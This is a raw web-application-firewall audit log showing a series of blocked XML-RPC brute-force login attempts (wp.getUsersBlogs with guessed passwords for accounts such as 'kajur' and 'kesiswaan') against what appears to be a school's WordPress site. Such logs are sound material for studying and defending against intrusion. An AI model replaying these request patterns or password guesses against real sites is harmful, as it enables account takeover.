Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d8ded76-Z-- --30dae106-A-- [14/Jun/2025:09:32:22 +0700] aEzfNmmwZ6YUkjOdtI7JjAAAAAU 103.236.140.4 40148 103.236.140.4 8181 --30dae106-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --30dae106-C-- wp.getUsersBlogs kajur OpF^MJrUK$SzYcOrfG --30dae106-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30dae106-E-- --30dae106-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868342241601 5242 (- - -) Stopwatch2: 1749868342241601 5242; combined=3777, p1=449, p2=3159, p3=0, p4=0, p5=100, sr=91, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30dae106-Z-- --4d8c0623-A-- [14/Jun/2025:09:33:22 +0700] aEzfcmIDXuKmWNi2UBS3NQAAAE8 103.236.140.4 40260 103.236.140.4 8181 --4d8c0623-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4d8c0623-C-- wp.getUsersBlogs kajur kajur888 --4d8c0623-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d8c0623-E-- --4d8c0623-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (53+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868402001337 6149 (- - -) Stopwatch2: 1749868402001337 6149; combined=4185, p1=521, p2=3488, p3=0, p4=0, p5=104, sr=86, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d8c0623-Z-- --da9df722-A-- [14/Jun/2025:09:34:22 +0700] aEzfrmIDXuKmWNi2UBS3gAAAAEM 103.236.140.4 40432 103.236.140.4 8181 --da9df722-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --da9df722-C-- wp.getUsersBlogs kajur Marketing2010 --da9df722-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da9df722-E-- --da9df722-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (80+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868462874452 4684 (- - -) Stopwatch2: 1749868462874452 4684; combined=3497, p1=358, p2=2945, p3=0, p4=0, p5=110, sr=78, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da9df722-Z-- --81887227-A-- [14/Jun/2025:09:35:22 +0700] aEzf6kMWfhkd5Y0sFtrsCwAAAIE 103.236.140.4 40552 103.236.140.4 8181 --81887227-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --81887227-C-- wp.getUsersBlogs kajur kajurPWD --81887227-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81887227-E-- --81887227-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (57+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868522192126 4170 (- - -) Stopwatch2: 1749868522192126 4170; combined=3227, p1=363, p2=2696, p3=0, p4=0, p5=97, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81887227-Z-- --32fbeb2d-A-- [14/Jun/2025:09:36:22 +0700] aEzgJmmwZ6YUkjOdtI7J_gAAAAA 103.236.140.4 40796 103.236.140.4 8181 --32fbeb2d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --32fbeb2d-C-- wp.getUsersBlogs kajur Password123!@# --32fbeb2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32fbeb2d-E-- --32fbeb2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (114+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868582155364 4373 (- - -) Stopwatch2: 1749868582155364 4373; combined=3269, p1=345, p2=2757, p3=0, p4=0, p5=97, sr=79, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32fbeb2d-Z-- --a58acf3a-A-- [14/Jun/2025:09:37:22 +0700] aEzgYmmwZ6YUkjOdtI7KNQAAAAU 103.236.140.4 40926 103.236.140.4 8181 --a58acf3a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a58acf3a-C-- wp.getUsersBlogs kajur 1q2w3e4r --a58acf3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a58acf3a-E-- --a58acf3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868642521044 4339 (- - -) Stopwatch2: 1749868642521044 4339; combined=3366, p1=406, p2=2795, p3=0, p4=0, p5=96, sr=97, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a58acf3a-Z-- --9628b641-A-- [14/Jun/2025:09:38:22 +0700] aEzgnmmwZ6YUkjOdtI7KewAAAAU 103.236.140.4 41090 103.236.140.4 8181 --9628b641-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9628b641-C-- wp.getUsersBlogs kajur secure --9628b641-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9628b641-E-- --9628b641-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (80+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868702176492 5370 (- - -) Stopwatch2: 1749868702176492 5370; combined=3802, p1=462, p2=3168, p3=0, p4=0, p5=101, sr=89, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9628b641-Z-- --b2244120-A-- [14/Jun/2025:09:39:24 +0700] aEzg3GmwZ6YUkjOdtI7KwQAAAAo 103.236.140.4 41272 103.236.140.4 8181 --b2244120-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 216 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b2244120-C-- wp.getUsersBlogs kajur qwewq --b2244120-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2244120-E-- --b2244120-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (79+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868764453337 4774 (- - -) Stopwatch2: 1749868764453337 4774; combined=3491, p1=357, p2=2944, p3=0, p4=0, p5=108, sr=78, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2244120-Z-- --9d00402c-A-- [14/Jun/2025:09:39:54 +0700] aEzg-mmwZ6YUkjOdtI7K3gAAAA0 103.236.140.4 41342 103.236.140.4 8181 --9d00402c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9d00402c-C-- wp.getUsersBlogs kajur 1234%^&* --9d00402c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d00402c-E-- --9d00402c-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868794940340 3854 (- - -) Stopwatch2: 1749868794940340 3854; combined=2870, p1=302, p2=2422, p3=0, p4=0, p5=87, sr=66, sw=59, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d00402c-Z-- --5eec5f32-A-- [14/Jun/2025:09:40:29 +0700] aEzhHWIDXuKmWNi2UBS3mQAAAEY 103.236.140.4 41374 103.236.140.4 8181 --5eec5f32-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5eec5f32-C-- wp.getUsersBlogs kajur 1a2s3d4f --5eec5f32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5eec5f32-E-- --5eec5f32-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (44+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868829575333 5526 (- - -) Stopwatch2: 1749868829575333 5526; combined=3836, p1=454, p2=3226, p3=0, p4=0, p5=91, sr=87, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5eec5f32-Z-- --4afcf874-A-- [14/Jun/2025:09:41:29 +0700] aEzhWWmwZ6YUkjOdtI7LNAAAAAQ 103.236.140.4 41582 103.236.140.4 8181 --4afcf874-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4afcf874-C-- wp.getUsersBlogs kajur basketball --4afcf874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4afcf874-E-- --4afcf874-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (97+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868889122275 4444 (- - -) Stopwatch2: 1749868889122275 4444; combined=3516, p1=322, p2=3011, p3=0, p4=0, p5=105, sr=74, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4afcf874-Z-- --5c891352-A-- [14/Jun/2025:09:42:38 +0700] aEzhnl3g_boun6Rx5jLS7QAAANY 103.236.140.4 41708 103.236.140.4 8181 --5c891352-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5c891352-C-- wp.getUsersBlogs kajur qwerty1 --5c891352-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c891352-E-- --5c891352-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (58+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749868958859801 5062 (- - -) Stopwatch2: 1749868958859801 5062; combined=3732, p1=444, p2=3119, p3=0, p4=0, p5=99, sr=77, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c891352-Z-- --ba98100f-A-- [14/Jun/2025:09:43:38 +0700] aEzh2mmwZ6YUkjOdtI7LfgAAAAg 103.236.140.4 41890 103.236.140.4 8181 --ba98100f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --ba98100f-C-- wp.getUsersBlogs kajur asshole --ba98100f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba98100f-E-- --ba98100f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (89+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869018218182 4108 (- - -) Stopwatch2: 1749869018218182 4108; combined=3187, p1=376, p2=2647, p3=0, p4=0, p5=95, sr=79, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba98100f-Z-- --8666136e-A-- [14/Jun/2025:09:44:38 +0700] aEziFmIDXuKmWNi2UBS3qwAAAEI 103.236.140.4 42166 103.236.140.4 8181 --8666136e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --8666136e-C-- wp.getUsersBlogs kajur target123 --8666136e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8666136e-E-- --8666136e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (116+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869078262230 4591 (- - -) Stopwatch2: 1749869078262230 4591; combined=3358, p1=343, p2=2822, p3=0, p4=0, p5=110, sr=80, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8666136e-Z-- --c7bdc84b-A-- [14/Jun/2025:09:45:38 +0700] aEziUmIDXuKmWNi2UBS4AQAAAFI 103.236.140.4 42354 103.236.140.4 8181 --c7bdc84b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c7bdc84b-C-- wp.getUsersBlogs kesiswaan kesiswaan1981 --c7bdc84b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7bdc84b-E-- --c7bdc84b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (92+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749869138048200 4209 (- - -) Stopwatch2: 1749869138048200 4209; combined=3236, p1=387, p2=2683, p3=0, p4=0, p5=96, sr=80, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7bdc84b-Z-- --e2596f49-A-- [14/Jun/2025:09:46:40 +0700] aEzikGmwZ6YUkjOdtI7MHQAAAAI 103.236.140.4 42510 103.236.140.4 8181 --e2596f49-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e2596f49-C-- wp.getUsersBlogs kesiswaan Marketing2017_ --e2596f49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2596f49-E-- --e2596f49-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (75+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] 